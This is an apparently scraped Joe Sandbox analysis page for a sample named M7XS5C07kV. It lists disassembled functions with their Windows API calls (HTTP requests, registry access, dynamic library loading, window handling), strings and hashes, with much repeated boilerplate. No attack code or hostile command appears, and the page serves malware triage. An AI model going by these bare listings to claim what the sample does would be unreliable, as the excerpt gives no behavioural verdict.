Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: _memmove$_free
String ID: 3c^$_^
API String ID: 2620147621-3555050690
Opcode ID: 3d53a7f6a8a29d4e1315877005630448e9d50b0f61d2250f04cbdbafd422119f
Instruction ID: 82e2c6b9dc20a77b47f0462740e59f4808930bc6d08ebae406df096c8c0a5eab
Opcode Fuzzy Hash: 3d53a7f6a8a29d4e1315877005630448e9d50b0f61d2250f04cbdbafd422119f
Instruction Fuzzy Hash: 7E516C75A083818FDB29CF29C448B6ABBE5FFC5310F08492DE58987391EB35E941CB42

Function 005E6192 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 141COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 005E6248
_memmove.LIBCMT ref: 005E62E4
_memset.LIBCMT ref: 005E6308

Strings

3c^, xrefs: 005E62AF
ERCP, xrefs: 005E61B3

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: _memset$_memmove
String ID: 3c^$ERCP
API String ID: 2532777613-2771788335
Opcode ID: 310b84860244251ee6c071d187fec5c33923025ad4dda5b3b359b61d97a6cb9e
Instruction ID: c43c386575150df8f692eb91ac87bb4724015e4e512feef398c0049c35e110f1
Opcode Fuzzy Hash: 310b84860244251ee6c071d187fec5c33923025ad4dda5b3b359b61d97a6cb9e
Instruction Fuzzy Hash: F451F37190071ADBDB28CF55C8457AABBF5FF58380F24896EE58ADB241E770EA41CB40

Function 006597F4 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(00EBE878,?), ref: 00659863
ScreenToClient.USER32(00000002,00000002), ref: 00659896
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00659903

Strings

P[, xrefs: 00659832, 0065992D

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID: P[
API String ID: 3880355969-2517523118
Opcode ID: 3e68ef2b55bd0a33c485ecb2365239feae4dfad0366b0323d595dea3865435c1
Instruction ID: 589a8e3fdb4be753eaa6c895d7840606da2500c02d59a1adcf34c0039087a207
Opcode Fuzzy Hash: 3e68ef2b55bd0a33c485ecb2365239feae4dfad0366b0323d595dea3865435c1
Instruction Fuzzy Hash: 99512D34A00209EFCF14DF54C984AEE7BB6FB45361F148559F8659B3A0D731AD85CBA0

Function 00632753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006327C0
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 006327DC
DeleteMenu.USER32(?,00000007,00000000), ref: 00632822
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00695890,00000000), ref: 0063286B

Strings

0, xrefs: 006327B5

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: bb24c79d4179c11af02c99cfb7f60adcdb18158d348aaabed16fc3ba9e07b807
Instruction ID: f5c584b3495dd4f742948488c015738599d2b3eaf72d9418d041a5bd22917dd0
Opcode Fuzzy Hash: bb24c79d4179c11af02c99cfb7f60adcdb18158d348aaabed16fc3ba9e07b807
Instruction Fuzzy Hash: 6341A0702043429FD720DF24C894B6ABBEAEF85314F14492EF9A697391D730E909CB92

Function 00658851 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 006588DE

Strings

P[, xrefs: 0065888D

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: InvalidateRect
String ID: P[
API String ID: 634782764-2517523118
Opcode ID: f281648aab999cf575700321bb269df589a40b8ae636bded1ea63413d26c356f
Instruction ID: 0171e13e19769168e8902f2e488070c359b06c7dca277cfd0f12364b75c26c40
Opcode Fuzzy Hash: f281648aab999cf575700321bb269df589a40b8ae636bded1ea63413d26c356f
Instruction Fuzzy Hash: EF31B234600108EEEB209F5CCC45BF97BA7EB05312F944112FD11F7AA1CA3199489B92

Function 0065AB37 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0065AB60
GetWindowRect.USER32(?,?), ref: 0065ABD6
PtInRect.USER32(?,?,0065C014), ref: 0065ABE6
MessageBeep.USER32(00000000), ref: 0065AC57

Strings

P[, xrefs: 0065AB9C, 0065ABFE

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID: P[
API String ID: 1352109105-2517523118
Opcode ID: fc033028c3a2d51f19c6bdb8051890fc3a887e9f368ec907d5bbd1696fd75054
Instruction ID: 784135ba46861cba7974171f94ec65f37b4398ad383340f19f14489e6f87de92
Opcode Fuzzy Hash: fc033028c3a2d51f19c6bdb8051890fc3a887e9f368ec907d5bbd1696fd75054
Instruction Fuzzy Hash: 48416E30600219DFCB12DF98D884BA97BF7FF49312F1892A9E8559B361D730A845CB92

Function 0064D7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0064D7C5

Part of subcall function 005D784B: _memmove.LIBCMT ref: 005D7899

Strings

cdecl, xrefs: 0064D81C
winapi, xrefs: 0064D836
stdcall, xrefs: 0064D847
none, xrefs: 0064D8A0

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: 1e0d25b288bf7a5e730ee6098b166e8632961fab9305ac2ecc194023e75daea7
Instruction ID: fdd83e228dba16f7a3e0cd582b3ae639c0a86e8b1b5b263be6c11f1c7c035340
Opcode Fuzzy Hash: 1e0d25b288bf7a5e730ee6098b166e8632961fab9305ac2ecc194023e75daea7
Instruction Fuzzy Hash: 4731AF7190461AAFCF10EF58C8559FEBBB6FF44320B10862AF865977D2DB71A905CB80

Function 00628E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 005D7DE1: _memmove.LIBCMT ref: 005D7E22

Part of subcall function 0062AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0062AABC

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00628F14
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00628F27
SendMessageW.USER32(?,00000189,?,00000000), ref: 00628F57

Part of subcall function 005D7BCC: _memmove.LIBCMT ref: 005D7C06

Strings

ListBox, xrefs: 00628ED3
ComboBox, xrefs: 00628E9E

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: 97135594b730cd20b7213007e1507b414c9e49fc6295e282a24c5d776fc9f998
Instruction ID: fe816378186ebcb5ca805a8e8d68965c99c63edef7d6d3f901031b14fb8cd77a
Opcode Fuzzy Hash: 97135594b730cd20b7213007e1507b414c9e49fc6295e282a24c5d776fc9f998
Instruction Fuzzy Hash: 9A21E6719051097EDB14ABB4DC49DFF7B6AEF453A0F14852AF411972E1DF394809DA10

Function 0064182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0064184C
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00641872
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 006418A2
InternetCloseHandle.WININET(00000000), ref: 006418E9

Part of subcall function 00642483: GetLastError.KERNEL32(?,?,00641817,00000000,00000000,00000001), ref: 00642498
Part of subcall function 00642483: SetEvent.KERNEL32(?,?,00641817,00000000,00000000,00000001), ref: 006424AD

Strings

, xrefs: 00641893

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 654b24d71888aa3773b6063ee6147c92257c5f9bc18700f06eb077ead9326e00
Instruction ID: 6f04272e9485d18143b6f485ff419745d87bf7805705b5d7126531ef141db1b4
Opcode Fuzzy Hash: 654b24d71888aa3773b6063ee6147c92257c5f9bc18700f06eb077ead9326e00
Instruction Fuzzy Hash: DF21BEB1500308BFEB119B60DC85EBF7BEEEB89745F10412AF805AA240EA248E4597A0

Function 0065C498 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 005D2612: GetWindowLongW.USER32(?,000000EB), ref: 005D2623

GetCursorPos.USER32(?), ref: 0065C4D2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0060B9AB,?,?,?,?,?), ref: 0065C4E7
GetCursorPos.USER32(?), ref: 0065C534
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0060B9AB,?,?,?), ref: 0065C56E

Strings

P[, xrefs: 0065C504, 0065C53A

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID: P[
API String ID: 2864067406-2517523118
Opcode ID: 26f30dc061a2bec92259385cfe37992f04b60117210244f78c4fd9672c63822d
Instruction ID: 3cf35062be8d949ffdd57c94a7df960495241b5bacfcb88e505b084a29598c12
Opcode Fuzzy Hash: 26f30dc061a2bec92259385cfe37992f04b60117210244f78c4fd9672c63822d
Instruction Fuzzy Hash: 69319335500118AFCF26CF98C858EEA7BBBEB49321F044065FD058B361D731AD65DBA4

Function 006563E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 005D1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 005D1D73
Part of subcall function 005D1D35: GetStockObject.GDI32(00000011), ref: 005D1D87
Part of subcall function 005D1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 005D1D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00656461
LoadLibraryW.KERNEL32(?), ref: 00656468
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0065647D
DestroyWindow.USER32(?), ref: 00656485

Strings

SysAnimate32, xrefs: 0065643C

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: c36a64550b050c6c5c2577e48787670763e0db54f06a84a6b973e1de6b676e4f
Instruction ID: 86d6e67609ca4210d35238d75cb6353018110534e7125d9099c0ee99e6a2d87d
Opcode Fuzzy Hash: c36a64550b050c6c5c2577e48787670763e0db54f06a84a6b973e1de6b676e4f
Instruction Fuzzy Hash: 17218B71200205BBEF109FA4DC80EBB77EEEB59369F909629FE10972A0D7319C55D760

Function 00636D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00636DBC
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00636DEF
GetStdHandle.KERNEL32(0000000C), ref: 00636E01
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00636E3B

Strings

nul, xrefs: 00636E36

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 47345558d4c6873fc9235e6ae45dc966a3d97203f481c92b21c982b1991aa617
Instruction ID: 108a4b236f78441ad4f90000c349b73de3b843ac5ca40a10f6bf05aac38f7966
Opcode Fuzzy Hash: 47345558d4c6873fc9235e6ae45dc966a3d97203f481c92b21c982b1991aa617
Instruction Fuzzy Hash: 0621A474600309BBDB209F69DC04A9A77F6EF45720F208629FCA1D73D0DB709955CB94

Function 00636E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00636E89
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00636EBB
GetStdHandle.KERNEL32(000000F6), ref: 00636ECC
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00636F06

Strings

nul, xrefs: 00636F01

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: c549eb20af3ef6479cc4ac9d6c3dd4a264148e0524578a415cce653a24fc2ab7
Instruction ID: a372d2c8aaab9ce5e0affe9ec899649c54b784b23b50ed649075cd38edc378bc
Opcode Fuzzy Hash: c549eb20af3ef6479cc4ac9d6c3dd4a264148e0524578a415cce653a24fc2ab7
Instruction Fuzzy Hash: E321D3B9504305BBDB209F69CC04AAA77FAEF44724F208A19FCA0D73D0DB70A955CB90

Function 0063AC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0063AC54
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0063ACA8
__swprintf.LIBCMT ref: 0063ACC1
SetErrorMode.KERNEL32(00000000,00000001,00000000,0065F910), ref: 0063ACFF

Strings

%lu, xrefs: 0063ACBB

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: d7f0564708f6933fbb0227dbeb64d11f1c00617dbd34f9e0d95fc1d82cc42be9
Instruction ID: 581da37d68bc9be320fa4e87a4a8026a820686adc78b54e337d748175b35ed9b
Opcode Fuzzy Hash: d7f0564708f6933fbb0227dbeb64d11f1c00617dbd34f9e0d95fc1d82cc42be9
Instruction Fuzzy Hash: 36217131A00209AFCB20DF68C945DAE7BB9FF89715F00406AF909EB351DB31EA45DB61

Function 00631142 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0062FCED,?,00630D40,?,00008000), ref: 0063115F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,0062FCED,?,00630D40,?,00008000), ref: 00631184
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0062FCED,?,00630D40,?,00008000), ref: 0063118E
Sleep.KERNEL32(?,?,?,?,?,?,?,0062FCED,?,00630D40,?,00008000), ref: 006311C1

Strings

@c, xrefs: 0063119D

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID: @c
API String ID: 2875609808-4006484605
Opcode ID: 267d91b188e6fb64aa20ee4fa4e1a52a7214bf529c9916a7f18240d776ce5bdc
Instruction ID: ec0037f8812d06af1dc5022c676ab9615019b8aa5636ec6b575a611c4c65ec2e
Opcode Fuzzy Hash: 267d91b188e6fb64aa20ee4fa4e1a52a7214bf529c9916a7f18240d776ce5bdc
Instruction Fuzzy Hash: A5112A31D01A1DE7CF10EFA5D848AEEBB7AFF0A711F004465EA41BA240CB709550CBE5

Function 0064EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0064EC07
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0064EC37
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0064ED6A
CloseHandle.KERNEL32(?), ref: 0064EDEB

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: d109b2789095afb6e7218779c6df8ae0340e5b7db2a1d1917ac97c46133699b9
Instruction ID: ee432c5a9b4b138c46f2b1e90e0dc6111a3d2c54ae738d068f5dbc0fb8dec3b3
Opcode Fuzzy Hash: d109b2789095afb6e7218779c6df8ae0340e5b7db2a1d1917ac97c46133699b9
Instruction Fuzzy Hash: EE8151716047119FD760EF28C846F6ABBE6BF84710F04881EF995DB3D2D671AC418B91

Function 00650037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 005D7DE1: _memmove.LIBCMT ref: 005D7E22

Part of subcall function 00650E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0064FDAD,?,?), ref: 00650E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006500FD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0065013C
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00650183
RegCloseKey.ADVAPI32(?,?), ref: 006501AF
RegCloseKey.ADVAPI32(00000000), ref: 006501BC

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: 0bdb37f340250cf7dabb3623967455cad95469525027f4d69e760cb1c667220d
Instruction ID: f16633fa056a32b795ddc037b355221981f5523ec733135599f072497044e468
Opcode Fuzzy Hash: 0bdb37f340250cf7dabb3623967455cad95469525027f4d69e760cb1c667220d
Instruction Fuzzy Hash: 21517D31208205AFD724EF58CC95E6EBBEAFF84314F44491EF99587291EB31E909CB52

Function 0064D8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 005D9837: __itow.LIBCMT ref: 005D9862
Part of subcall function 005D9837: __swprintf.LIBCMT ref: 005D98AC

LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0064D927
GetProcAddress.KERNEL32(00000000,?), ref: 0064D9AA
GetProcAddress.KERNEL32(00000000,00000000), ref: 0064D9C6
GetProcAddress.KERNEL32(00000000,?), ref: 0064DA07
FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0064DA21

